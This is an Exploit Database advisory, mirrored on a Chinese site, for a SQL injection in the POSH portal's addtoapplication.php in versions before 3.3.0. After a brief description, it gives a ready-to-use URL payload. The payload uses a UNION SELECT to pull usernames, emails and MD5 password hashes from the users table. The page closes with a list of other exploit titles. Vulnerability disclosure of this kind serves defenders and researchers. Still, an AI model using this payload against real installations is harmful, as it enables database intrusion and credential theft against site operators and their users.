POSH 3.1.x – ‘addtoapplication.php’ SQL Injection

Exploit Database
121 阅读

作者： Anthony BAUBE

日期： 2014-02-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39108/

source: https://www.securityfocus.com/bid/65817/info

POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to POSH 3.3.0 are vulnerable.

http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item

%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23

last Exploits
POSH 3.1.x – ‘addtoapplication.php’ SQL Injection的更多信息

DZOIC ClipHouse – Authentication Bypass：
Joomla! Component NextGen Editor 2.1.0 – ‘plname’ SQL Injection：
WordPress Plugin Contact Form Check Tester 1.0.2 – Broken Access Control：
Subrion CMS 4.2.1 – Cross-Site Scripting：
Spreecommerce 0.60.1 – Arbitrary Command Execution (Metasploit)：
ASUS-DSL N10 1.1.2.2_17 – Authentication Bypass：
Joomla! Component com_google – Local File Inclusion：
Grocy <=4.0.2 - CSRF：